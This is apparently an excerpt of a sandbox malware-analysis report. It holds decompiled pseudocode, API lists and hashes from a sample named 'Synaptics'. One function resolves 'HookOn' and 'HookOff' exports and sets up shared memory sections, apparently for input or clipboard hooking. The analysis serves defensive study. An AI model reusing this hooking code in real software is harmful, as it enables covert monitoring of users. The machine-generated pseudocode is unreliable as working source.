                                                                                                                                                                                                                            					 *((intOrPtr*)(_t99 + 0x48)) = GetProcAddress( *(_t99 + 0x40), "HookOff");
                                                                                                                                                                                                                            					if( *((intOrPtr*)(_t99 + 0x44)) == 0 ||  *((intOrPtr*)(_t99 + 0x48)) == 0) {
                                                                                                                                                                                                                            						E0040D144(0x4766c8, 1);
                                                                                                                                                                                                                            						E00404378();
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            					_t75 = CreateFileMappingA(0xffffffff, 0, "true", 0, "true", "ElReceptor");
                                                                                                                                                                                                                            					 *(_t99 + 0x30) = _t75;
                                                                                                                                                                                                                            					if(_t75 == 0) {
                                                                                                                                                                                                                            						E0040D144(0x4766f8, 1);
                                                                                                                                                                                                                            						E00404378();
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            					_t76 = MapViewOfFile( *(_t99 + 0x30), 2, 0, 0, 0);
                                                                                                                                                                                                                            					 *(_t99 + 0x38) = _t76;
                                                                                                                                                                                                                            					 *_t76 = _t97;
                                                                                                                                                                                                                            					_t77 = CreateFileMappingA(0xffffffff, 0, "true", 0, "true", "CBReceptor");
                                                                                                                                                                                                                            					 *(_t99 + 0x34) = _t77;
                                                                                                                                                                                                                            					if(_t77 == 0) {
                                                                                                                                                                                                                            						E0040D144(0x4766f8, 1);
                                                                                                                                                                                                                            						E00404378();
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            					_t78 = MapViewOfFile( *(_t99 + 0x34), 2, 0, 0, 0);
                                                                                                                                                                                                                            					 *(_t99 + 0x3c) = _t78;
                                                                                                                                                                                                                            					 *_t78 = _t97;
                                                                                                                                                                                                                            					 *((intOrPtr*)(_t99 + 0x44))();
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            				_pop(_t89);
                                                                                                                                                                                                                            				 *[fs:eax] = _t89;
                                                                                                                                                                                                                            				_push(E0047669E);
                                                                                                                                                                                                                            				return E004049C0( &_v8);
                                                                                                                                                                                                                            			}



















                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • LoadLibraryA.KERNEL32(00000000,00000000,00476697,?,?,?,?,00000000,?,0049A2F2,00000000,00000000,0049A352), ref: 00476522
                                                                                                                                                                                                                            • LoadLibraryA.KERNEL32(00000000,00000000,00000000,00476697,?,?,?,?,00000000,?,0049A2F2,00000000,00000000,0049A352), ref: 0047655A
                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,HookOn), ref: 0047656B
                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,HookOff), ref: 0047657C
                                                                                                                                                                                                                            • CreateFileMappingA.KERNEL32 ref: 004765B5
                                                                                                                                                                                                                            • MapViewOfFile.KERNEL32(?,00000002,00000000,00000000,00000000,000000FF,00000000,?,00000000,?,ElReceptor,00000000,HookOff,00000000,00000000,00476697), ref: 004765E5
                                                                                                                                                                                                                            • CreateFileMappingA.KERNEL32 ref: 00476600
                                                                                                                                                                                                                            • MapViewOfFile.KERNEL32(?,00000002,00000000,00000000,00000000,000000FF,00000000,?,00000000,?,CBReceptor,?,00000002,00000000,00000000,00000000), ref: 00476630
                                                                                                                                                                                                                            • FreeLibrary.KERNEL32(?,00000000,00476697,?,?,?,?,00000000,?,0049A2F2,00000000,00000000,0049A352), ref: 00476652
                                                                                                                                                                                                                            • UnmapViewOfFile.KERNEL32(?,00000000,00476697,?,?,?,?,00000000,?,0049A2F2,00000000,00000000,0049A352), ref: 00476661
                                                                                                                                                                                                                            • UnmapViewOfFile.KERNEL32(?,?,00000000,00476697,?,?,?,?,00000000,?,0049A2F2,00000000,00000000,0049A352), ref: 0047666A
                                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000,?,?,00000000,00476697,?,?,?,?,00000000,?,0049A2F2,00000000,00000000,0049A352), ref: 00476673
                                                                                                                                                                                                                            • CloseHandle.KERNEL32(?,00000000,?,?,00000000,00476697,?,?,?,?,00000000,?,0049A2F2,00000000,00000000,0049A352), ref: 0047667C
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000009.00000002.407426556.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407417906.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407497738.000000000049B000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407508740.00000000004A5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_9_2_400000_Synaptics.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: File$View$Library$AddressCloseCreateHandleLoadMappingProcUnmap$Free
                                                                                                                                                                                                                            • String ID: CBReceptor$ElReceptor$HookOff$HookOn
                                                                                                                                                                                                                            • API String ID: 2408097603-676361416
                                                                                                                                                                                                                            • Opcode ID: 2b51ab161f7a6a73c944b74f510952dad87c742354b9ad4922b2cb5082a712e8
                                                                                                                                                                                                                            • Instruction ID: bf3a7df91238c31d5b8269ba8868fe670cbdf993f40fb106005159f73c36cbb0
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 2b51ab161f7a6a73c944b74f510952dad87c742354b9ad4922b2cb5082a712e8
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 534163B0700B00ABD730BBB6DD86B5677E5AB44708F91453FF649AB6D1CA79B8048B0C
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            C-Code - Quality: 65%
                                                                                                                                                                                                                            			E0042A510(intOrPtr __eax, void* __ebx, void* __ecx, intOrPtr* __edx, void* __edi, void* __esi, char* _a4) {
                                                                                                                                                                                                                            				intOrPtr _v8;
                                                                                                                                                                                                                            				intOrPtr* _v12;
                                                                                                                                                                                                                            				void* _v16;
                                                                                                                                                                                                                            				struct HDC__* _v20;
                                                                                                                                                                                                                            				char _v24;
                                                                                                                                                                                                                            				intOrPtr* _v28;
                                                                                                                                                                                                                            				intOrPtr _v32;
                                                                                                                                                                                                                            				intOrPtr _v36;
                                                                                                                                                                                                                            				signed int _v37;
                                                                                                                                                                                                                            				intOrPtr _v44;
                                                                                                                                                                                                                            				void* _v48;
                                                                                                                                                                                                                            				struct HDC__* _v52;
                                                                                                                                                                                                                            				intOrPtr _v56;
                                                                                                                                                                                                                            				intOrPtr* _v60;
                                                                                                                                                                                                                            				intOrPtr* _v64;
                                                                                                                                                                                                                            				short _v66;
                                                                                                                                                                                                                            				short _v68;
                                                                                                                                                                                                                            				signed short _v70;
                                                                                                                                                                                                                            				signed short _v72;
                                                                                                                                                                                                                            				void* _v76;
                                                                                                                                                                                                                            				intOrPtr _v172;
                                                                                                                                                                                                                            				char _v174;
                                                                                                                                                                                                                            				intOrPtr _t150;
                                                                                                                                                                                                                            				signed int _t160;
                                                                                                                                                                                                                            				intOrPtr _t163;
                                                                                                                                                                                                                            				void* _t166;
                                                                                                                                                                                                                            				void* _t174;
                                                                                                                                                                                                                            				void* _t183;
                                                                                                                                                                                                                            				signed int _t188;
                                                                                                                                                                                                                            				intOrPtr _t189;
                                                                                                                                                                                                                            				struct HDC__* _t190;
                                                                                                                                                                                                                            				struct HDC__* _t204;
                                                                                                                                                                                                                            				signed int _t208;
                                                                                                                                                                                                                            				signed short _t214;
                                                                                                                                                                                                                            				intOrPtr _t241;
                                                                                                                                                                                                                            				intOrPtr* _t245;
                                                                                                                                                                                                                            				intOrPtr _t251;
                                                                                                                                                                                                                            				intOrPtr _t289;
                                                                                                                                                                                                                            				intOrPtr _t290;
                                                                                                                                                                                                                            				intOrPtr _t295;
                                                                                                                                                                                                                            				signed int _t297;
                                                                                                                                                                                                                            				signed int _t317;
                                                                                                                                                                                                                            				void* _t319;
                                                                                                                                                                                                                            				void* _t320;
                                                                                                                                                                                                                            				signed int _t321;
                                                                                                                                                                                                                            				void* _t322;
                                                                                                                                                                                                                            				void* _t323;
                                                                                                                                                                                                                            				void* _t324;
                                                                                                                                                                                                                            				intOrPtr _t325;
                                                                                                                                                                                                                            
                                                                                                                                                                                                                            				_t316 = __edi;
                                                                                                                                                                                                                            				_t323 = _t324;
                                                                                                                                                                                                                            				_t325 = _t324 + 0xffffff54;
                                                                                                                                                                                                                            				_t319 = __ecx;
                                                                                                                                                                                                                            				_v12 = __edx;
                                                                                                                                                                                                                            				_v8 = __eax;
                                                                                                                                                                                                                            				_v52 = 0;
                                                                                                                                                                                                                            				_v44 = 0;
                                                                                                                                                                                                                            				_v60 = 0;
                                                                                                                                                                                                                            				 *((intOrPtr*)( *_v12 + 0xc))(__edi, __esi, __ebx, _t322);
                                                                                                                                                                                                                            				_v37 = _v36 == 0xc;
                                                                                                                                                                                                                            				if(_v37 != 0) {
                                                                                                                                                                                                                            					_v36 = 0x28;
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            				_v28 = E0040275C(_v36 + 0x40c);
                                                                                                                                                                                                                            				_v64 = _v28;
                                                                                                                                                                                                                            				_push(_t323);
                                                                                                                                                                                                                            				_push(0x42aa2d);
                                                                                                                                                                                                                            				_push( *[fs:edx]);
                                                                                                                                                                                                                            				 *[fs:edx] = _t325;
                                                                                                                                                                                                                            				_push(_t323);
                                                                                                                                                                                                                            				_push(0x42aa00);
                                                                                                                                                                                                                            				_push( *[fs:edx]);
                                                                                                                                                                                                                            				 *[fs:edx] = _t325;
                                                                                                                                                                                                                            				if(_v37 == 0) {
                                                                                                                                                                                                                            					 *((intOrPtr*)( *_v12 + 0xc))();
                                                                                                                                                                                                                            					_t320 = _t319 - _v36;
                                                                                                                                                                                                                            					_t150 =  *((intOrPtr*)(_v64 + 0x10));
                                                                                                                                                                                                                            					if(_t150 != 3 && _t150 != 0) {
                                                                                                                                                                                                                            						_v60 = E00403BBC(1);
                                                                                                                                                                                                                            						if(_a4 == 0) {
                                                                                                                                                                                                                            							E004032B4( &_v174, 0xe);
                                                                                                                                                                                                                            							_v174 = 0x4d42;
                                                                                                                                                                                                                            							_v172 = _v36 + _t320;
                                                                                                                                                                                                                            							_a4 =  &_v174;
                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                            						 *((intOrPtr*)( *_v60 + 0x10))();
                                                                                                                                                                                                                            						 *((intOrPtr*)( *_v60 + 0x10))();
                                                                                                                                                                                                                            						 *((intOrPtr*)( *_v60 + 0x10))();
                                                                                                                                                                                                                            						E0041D93C(_v60,  *_v60, _v12, _t316, _t320, _t320, 0);
                                                                                                                                                                                                                            						 *((intOrPtr*)( *_v60 + 0x14))();
                                                                                                                                                                                                                            						_v12 = _v60;
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                            					 *((intOrPtr*)( *_v12 + 0xc))();
                                                                                                                                                                                                                            					_t251 = _v64;
                                                                                                                                                                                                                            					E004032B4(_t251, 0x28);
                                                                                                                                                                                                                            					_t241 = _t251;
                                                                                                                                                                                                                            					 *(_t241 + 4) = _v72 & 0x0000ffff;
                                                                                                                                                                                                                            					 *(_t241 + 8) = _v70 & 0x0000ffff;
                                                                                                                                                                                                                            					 *((short*)(_t241 + 0xc)) = _v68;
                                                                                                                                                                                                                            					 *((short*)(_t241 + 0xe)) = _v66;
                                                                                                                                                                                                                            					_t320 = _t319 - 0xc;
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            				_t245 = _v64;
                                                                                                                                                                                                                            				 *_t245 = _v36;
                                                                                                                                                                                                                            				_v32 = _v28 + _v36;
                                                                                                                                                                                                                            				if( *((short*)(_t245 + 0xc)) != 1) {
                                                                                                                                                                                                                            					E00425F40();
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            				if(_v36 == 0x28) {
                                                                                                                                                                                                                            					_t214 =  *(_t245 + 0xe);
                                                                                                                                                                                                                            					if(_t214 == 0x10 || _t214 == 0x20) {
                                                                                                                                                                                                                            						if( *((intOrPtr*)(_t245 + 0x10)) == 3) {
                                                                                                                                                                                                                            							E0041D8CC(_v12, 0xc, _v32);
                                                                                                                                                                                                                            							_v32 = _v32 + 0xc;
                                                                                                                                                                                                                            							_t320 = _t320 - 0xc;
                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            				if( *(_t245 + 0x20) == 0) {
                                                                                                                                                                                                                            					 *(_t245 + 0x20) = E004261D0( *(_t245 + 0xe));
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            				_t317 = _v37 & 0x000000ff;
                                                                                                                                                                                                                            				_t257 =  *(_t245 + 0x20) * 0;
                                                                                                                                                                                                                            				E0041D8CC(_v12,  *(_t245 + 0x20) * 0, _v32);
                                                                                                                                                                                                                            				_t321 = _t320 -  *(_t245 + 0x20) * 0;
                                                                                                                                                                                                                            				if( *(_t245 + 0x14) == 0) {
                                                                                                                                                                                                                            					_t297 =  *(_t245 + 0xe) & 0x0000ffff;
                                                                                                                                                                                                                            					_t208 = E004261F0( *((intOrPtr*)(_t245 + 4)), 0x20, _t297);
                                                                                                                                                                                                                            					asm("cdq");
                                                                                                                                                                                                                            					_t257 = _t208 * (( *(_t245 + 8) ^ _t297) - _t297);
                                                                                                                                                                                                                            					 *(_t245 + 0x14) = _t208 * (( *(_t245 + 8) ^ _t297) - _t297);
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            				_t160 =  *(_t245 + 0x14);
                                                                                                                                                                                                                            				if(_t321 > _t160) {
                                                                                                                                                                                                                            					_t321 = _t160;
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            				if(_v37 != 0) {
                                                                                                                                                                                                                            					_t160 = E00426498(_v32);
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            				_push(0);
                                                                                                                                                                                                                            				L00407638();
                                                                                                                                                                                                                            				_v16 = E00426060(_t160);
                                                                                                                                                                                                                            				_push(_t323);
                                                                                                                                                                                                                            				_push(0x42a97b);
                                                                                                                                                                                                                            				_push( *[fs:edx]);
                                                                                                                                                                                                                            				 *[fs:edx] = _t325;
                                                                                                                                                                                                                            				_t163 =  *((intOrPtr*)(_v64 + 0x10));
                                                                                                                                                                                                                            				if(_t163 == 0 || _t163 == 3) {
                                                                                                                                                                                                                            					if( *0x49b620 == 0) {
                                                                                                                                                                                                                            						_push(0);
                                                                                                                                                                                                                            						_push(0);
                                                                                                                                                                                                                            						_push( &_v24);
                                                                                                                                                                                                                            						_push(0);
                                                                                                                                                                                                                            						_push(_v28);
                                                                                                                                                                                                                            						_t166 = _v16;
                                                                                                                                                                                                                            						_push(_t166);
                                                                                                                                                                                                                            						L004072E8();
                                                                                                                                                                                                                            						_v44 = _t166;
                                                                                                                                                                                                                            						if(_v44 == 0 || _v24 == 0) {
                                                                                                                                                                                                                            							if(GetLastError() != 0) {
                                                                                                                                                                                                                            								E0040E79C(_t245, _t257, _t317, _t321);
                                                                                                                                                                                                                            							} else {
                                                                                                                                                                                                                            								E00425F40();
                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                            						_push(_t323);
                                                                                                                                                                                                                            						_push( *[fs:eax]);
                                                                                                                                                                                                                            						 *[fs:eax] = _t325;
                                                                                                                                                                                                                            						E0041D8CC(_v12, _t321, _v24);
                                                                                                                                                                                                                            						_pop(_t289);
                                                                                                                                                                                                                            						 *[fs:eax] = _t289;
                                                                                                                                                                                                                            						_t290 = 0x42a94a;
                                                                                                                                                                                                                            						 *[fs:eax] = _t290;
                                                                                                                                                                                                                            						_push(0x42a982);
                                                                                                                                                                                                                            						_t174 = _v16;
                                                                                                                                                                                                                            						_push(_t174);
                                                                                                                                                                                                                            						_push(0);
                                                                                                                                                                                                                            						L00407888();
                                                                                                                                                                                                                            						return _t174;
                                                                                                                                                                                                                            					} else {
                                                                                                                                                                                                                            						goto L27;
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                            					L27:
                                                                                                                                                                                                                            					_v20 = 0;
                                                                                                                                                                                                                            					_v24 = E0040275C(_t321);
                                                                                                                                                                                                                            					_push(_t323);
                                                                                                                                                                                                                            					_push(0x42a8e3);
                                                                                                                                                                                                                            					_push( *[fs:edx]);
                                                                                                                                                                                                                            					 *[fs:edx] = _t325;
                                                                                                                                                                                                                            					_t263 = _t321;
                                                                                                                                                                                                                            					E0041D8CC(_v12, _t321, _v24);
                                                                                                                                                                                                                            					_push(_v16);
                                                                                                                                                                                                                            					L004072E0();
                                                                                                                                                                                                                            					_v20 = E00426060(_v16);
                                                                                                                                                                                                                            					_push(1);
                                                                                                                                                                                                                            					_push(1);
                                                                                                                                                                                                                            					_t183 = _v16;
                                                                                                                                                                                                                            					_push(_t183);
                                                                                                                                                                                                                            					L004072D8();
                                                                                                                                                                                                                            					_v48 = SelectObject(_v20, _t183);
                                                                                                                                                                                                                            					_v56 = 0;
                                                                                                                                                                                                                            					_t188 =  *(_v64 + 0x20);
                                                                                                                                                                                                                            					if(_t188 > 0) {
                                                                                                                                                                                                                            						_t263 = _t188;
                                                                                                                                                                                                                            						_v52 = E00426750(0, _t188);
                                                                                                                                                                                                                            						_push(0);
                                                                                                                                                                                                                            						_push(_v52);
                                                                                                                                                                                                                            						_t204 = _v20;
                                                                                                                                                                                                                            						_push(_t204);
                                                                                                                                                                                                                            						L00407440();
                                                                                                                                                                                                                            						_v56 = _t204;
                                                                                                                                                                                                                            						_push(_v20);
                                                                                                                                                                                                                            						L00407418();
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            					_push(_t323);
                                                                                                                                                                                                                            					_push(0x42a8b7);
                                                                                                                                                                                                                            					_push( *[fs:edx]);
                                                                                                                                                                                                                            					 *[fs:edx] = _t325;
                                                                                                                                                                                                                            					_push(0);
                                                                                                                                                                                                                            					_t189 = _v28;
                                                                                                                                                                                                                            					_push(_t189);
                                                                                                                                                                                                                            					_push(_v24);
                                                                                                                                                                                                                            					_push("true");
                                                                                                                                                                                                                            					_push(_t189);
                                                                                                                                                                                                                            					_t190 = _v20;
                                                                                                                                                                                                                            					_push(_t190);
                                                                                                                                                                                                                            					L004072F0();
                                                                                                                                                                                                                            					_v44 = _t190;
                                                                                                                                                                                                                            					if(_v44 == 0) {
                                                                                                                                                                                                                            						if(GetLastError() != 0) {
                                                                                                                                                                                                                            							E0040E79C(_t245, _t263, _t317, _t321);
                                                                                                                                                                                                                            						} else {
                                                                                                                                                                                                                            							E00425F40();
                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            					_pop(_t295);
                                                                                                                                                                                                                            					 *[fs:eax] = _t295;
                                                                                                                                                                                                                            					_push(0x42a8be);
                                                                                                                                                                                                                            					if(_v56 != 0) {
                                                                                                                                                                                                                            						_push(0xffffffff);
                                                                                                                                                                                                                            						_push(_v56);
                                                                                                                                                                                                                            						_push(_v20);
                                                                                                                                                                                                                            						L00407440();
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            					return DeleteObject(SelectObject(_v20, _v48));
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            			}
                                                                                                                                                                                                                            0x0042a5a3
                                                                                                                                                                                                                            0x0042a5a6
                                                                                                                                                                                                                            0x0042a5b2
                                                                                                                                                                                                                            0x0042a5b7
                                                                                                                                                                                                                            0x0042a5bd
                                                                                                                                                                                                                            0x0042a5c4
                                                                                                                                                                                                                            0x0042a5cb
                                                                                                                                                                                                                            0x0042a5d3
                                                                                                                                                                                                                            0x0042a5d7
                                                                                                                                                                                                                            0x0042a5d7
                                                                                                                                                                                                                            0x0042a6ac
                                                                                                                                                                                                                            0x0042a6b2
                                                                                                                                                                                                                            0x0042a6ba
                                                                                                                                                                                                                            0x0042a6c2
                                                                                                                                                                                                                            0x0042a6c4
                                                                                                                                                                                                                            0x0042a6c4
                                                                                                                                                                                                                            0x0042a6cd
                                                                                                                                                                                                                            0x0042a6cf
                                                                                                                                                                                                                            0x0042a6d7
                                                                                                                                                                                                                            0x0042a6e3
                                                                                                                                                                                                                            0x0042a6f0
                                                                                                                                                                                                                            0x0042a6f5
                                                                                                                                                                                                                            0x0042a6f9
                                                                                                                                                                                                                            0x0042a6f9
                                                                                                                                                                                                                            0x0042a6e3
                                                                                                                                                                                                                            0x0042a6d7
                                                                                                                                                                                                                            0x0042a700
                                                                                                                                                                                                                            0x0042a70b
                                                                                                                                                                                                                            0x0042a70b
                                                                                                                                                                                                                            0x0042a711
                                                                                                                                                                                                                            0x0042a71d
                                                                                                                                                                                                                            0x0042a726
                                                                                                                                                                                                                            0x0042a738
                                                                                                                                                                                                                            0x0042a73e
                                                                                                                                                                                                                            0x0042a740
                                                                                                                                                                                                                            0x0042a74c
                                                                                                                                                                                                                            0x0042a756
                                                                                                                                                                                                                            0x0042a75b
                                                                                                                                                                                                                            0x0042a75e
                                                                                                                                                                                                                            0x0042a75e
                                                                                                                                                                                                                            0x0042a761
                                                                                                                                                                                                                            0x0042a766
                                                                                                                                                                                                                            0x0042a768
                                                                                                                                                                                                                            0x0042a768
                                                                                                                                                                                                                            0x0042a76e
                                                                                                                                                                                                                            0x0042a773
                                                                                                                                                                                                                            0x0042a773
                                                                                                                                                                                                                            0x0042a778
                                                                                                                                                                                                                            0x0042a77a
                                                                                                                                                                                                                            0x0042a784
                                                                                                                                                                                                                            0x0042a789
                                                                                                                                                                                                                            0x0042a78a
                                                                                                                                                                                                                            0x0042a78f
                                                                                                                                                                                                                            0x0042a792
                                                                                                                                                                                                                            0x0042a798
                                                                                                                                                                                                                            0x0042a79d
                                                                                                                                                                                                                            0x0042a7ab
                                                                                                                                                                                                                            0x0042a8ea
                                                                                                                                                                                                                            0x0042a8ec
                                                                                                                                                                                                                            0x0042a8f1
                                                                                                                                                                                                                            0x0042a8f2
                                                                                                                                                                                                                            0x0042a8f7
                                                                                                                                                                                                                            0x0042a8f8
                                                                                                                                                                                                                            0x0042a8fb
                                                                                                                                                                                                                            0x0042a8fc
                                                                                                                                                                                                                            0x0042a901
                                                                                                                                                                                                                            0x0042a908
                                                                                                                                                                                                                            0x0042a917
                                                                                                                                                                                                                            0x0042a920
                                                                                                                                                                                                                            0x0042a919
                                                                                                                                                                                                                            0x0042a919
                                                                                                                                                                                                                            0x0042a919
                                                                                                                                                                                                                            0x0042a917
                                                                                                                                                                                                                            0x0042a927
                                                                                                                                                                                                                            0x0042a92d
                                                                                                                                                                                                                            0x0042a930
                                                                                                                                                                                                                            0x0042a93b
                                                                                                                                                                                                                            0x0042a942
                                                                                                                                                                                                                            0x0042a945
                                                                                                                                                                                                                            0x0042a964
                                                                                                                                                                                                                            0x0042a967
                                                                                                                                                                                                                            0x0042a96a
                                                                                                                                                                                                                            0x0042a96f
                                                                                                                                                                                                                            0x0042a972
                                                                                                                                                                                                                            0x0042a973
                                                                                                                                                                                                                            0x0042a975
                                                                                                                                                                                                                            0x0042a97a
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0042a7b1
                                                                                                                                                                                                                            0x0042a7b1
                                                                                                                                                                                                                            0x0042a7b3
                                                                                                                                                                                                                            0x0042a7bd
                                                                                                                                                                                                                            0x0042a7c2
                                                                                                                                                                                                                            0x0042a7c3
                                                                                                                                                                                                                            0x0042a7c8
                                                                                                                                                                                                                            0x0042a7cb
                                                                                                                                                                                                                            0x0042a7d1
                                                                                                                                                                                                                            0x0042a7d6
                                                                                                                                                                                                                            0x0042a7de
                                                                                                                                                                                                                            0x0042a7df
                                                                                                                                                                                                                            0x0042a7e9
                                                                                                                                                                                                                            0x0042a7ec
                                                                                                                                                                                                                            0x0042a7ee
                                                                                                                                                                                                                            0x0042a7f0
                                                                                                                                                                                                                            0x0042a7f3
                                                                                                                                                                                                                            0x0042a7f4
                                                                                                                                                                                                                            0x0042a803
                                                                                                                                                                                                                            0x0042a808
                                                                                                                                                                                                                            0x0042a80e
                                                                                                                                                                                                                            0x0042a813
                                                                                                                                                                                                                            0x0042a815
                                                                                                                                                                                                                            0x0042a821
                                                                                                                                                                                                                            0x0042a824
                                                                                                                                                                                                                            0x0042a829
                                                                                                                                                                                                                            0x0042a82a
                                                                                                                                                                                                                            0x0042a82d
                                                                                                                                                                                                                            0x0042a82e
                                                                                                                                                                                                                            0x0042a833
                                                                                                                                                                                                                            0x0042a839

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • 73C9AC50.USER32(00000000,?,00000000,0042AA2D,?,?), ref: 0042A77A
                                                                                                                                                                                                                            • 73C9A590.GDI32(00000001,00000000,0042A8E3,?,00000000,0042A97B,?,00000000,?,00000000,0042AA2D,?,?), ref: 0042A7DF
                                                                                                                                                                                                                            • 73C9A520.GDI32(00000001,00000001,00000001,00000001,00000000,0042A8E3,?,00000000,0042A97B,?,00000000,?,00000000,0042AA2D,?,?), ref: 0042A7F4
                                                                                                                                                                                                                            • SelectObject.GDI32(?,00000000), ref: 0042A7FE
                                                                                                                                                                                                                            • 73C9B410.GDI32(?,?,00000000,?,00000000,00000001,00000001,00000001,00000001,00000000,0042A8E3,?,00000000,0042A97B,?,00000000), ref: 0042A82E
                                                                                                                                                                                                                            • 73C9B150.GDI32(?,?,?,00000000,?,00000000,00000001,00000001,00000001,00000001,00000000,0042A8E3,?,00000000,0042A97B), ref: 0042A83A
                                                                                                                                                                                                                            • 73C9A7F0.GDI32(?,?,?,00000000,?,00000000,00000000,0042A8B7,?,?,00000000,00000001,00000001,00000001,00000001,00000000), ref: 0042A85E
                                                                                                                                                                                                                            • GetLastError.KERNEL32(?,?,?,00000000,?,00000000,00000000,0042A8B7,?,?,00000000,00000001,00000001,00000001,00000001,00000000), ref: 0042A86C
                                                                                                                                                                                                                            • 73C9B410.GDI32(?,00000000,000000FF,0042A8BE,00000000,?,00000000,00000000,0042A8B7,?,?,00000000,00000001,00000001,00000001,00000001), ref: 0042A89E
                                                                                                                                                                                                                            • SelectObject.GDI32(?,?), ref: 0042A8AB
                                                                                                                                                                                                                            • DeleteObject.GDI32(00000000), ref: 0042A8B1
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000009.00000002.407426556.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407417906.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407497738.000000000049B000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407508740.00000000004A5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_9_2_400000_Synaptics.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Object$B410Select$A520A590B150DeleteErrorLast
                                                                                                                                                                                                                            • String ID: ($BM
                                                                                                                                                                                                                            • API String ID: 3415089252-2980357723
                                                                                                                                                                                                                            • Opcode ID: 2a3d87137b30854e2cc8dc58c18fbf8192ff982d77d5cdf853aead562bb2ee10
                                                                                                                                                                                                                            • Instruction ID: 25b6b903fc63a4d1ab3304e11741f41bc99333438c5c48279b365a0d6610163c
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 2a3d87137b30854e2cc8dc58c18fbf8192ff982d77d5cdf853aead562bb2ee10
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: A8D14C74F002189FDB04EFA9D885BAEBBB5FF48304F54846AE904E7391D7389851CB69
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                                            			E00478268(intOrPtr* __eax, void* __edx, void* __esi) {
                                                                                                                                                                                                                            				intOrPtr* _t4;
                                                                                                                                                                                                                            				_Unknown_base(*)()* _t5;
                                                                                                                                                                                                                            				struct HINSTANCE__* _t12;
                                                                                                                                                                                                                            
                                                                                                                                                                                                                            				 *((intOrPtr*)(__edx + __eax)) =  *((intOrPtr*)(__edx + __eax)) + __eax;
                                                                                                                                                                                                                            				 *__eax =  *__eax + __eax;
                                                                                                                                                                                                                            				 *__eax =  *__eax + __eax;
                                                                                                                                                                                                                            				_t4 = __eax + __eax;
                                                                                                                                                                                                                            				 *_t4 =  *_t4 + _t4;
                                                                                                                                                                                                                            				 *_t4 =  *_t4 + _t4;
                                                                                                                                                                                                                            				 *_t4 =  *_t4 + _t4;
                                                                                                                                                                                                                            				_t5 = GetModuleHandleA("ole32.dll");
                                                                                                                                                                                                                            				_t12 = _t5;
                                                                                                                                                                                                                            				if(_t12 != 0) {
                                                                                                                                                                                                                            					 *0x49c9cc = GetProcAddress(_t12, "CoCreateInstanceEx");
                                                                                                                                                                                                                            					 *0x49c9d0 = GetProcAddress(_t12, "CoInitializeEx");
                                                                                                                                                                                                                            					 *0x49c9d4 = GetProcAddress(_t12, "CoAddRefServerProcess");
                                                                                                                                                                                                                            					 *0x49c9d8 = GetProcAddress(_t12, "CoReleaseServerProcess");
                                                                                                                                                                                                                            					 *0x49c9dc = GetProcAddress(_t12, "CoResumeClassObjects");
                                                                                                                                                                                                                            					_t5 = GetProcAddress(_t12, "CoSuspendClassObjects");
                                                                                                                                                                                                                            					 *0x49c9e0 = _t5;
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            				return _t5;
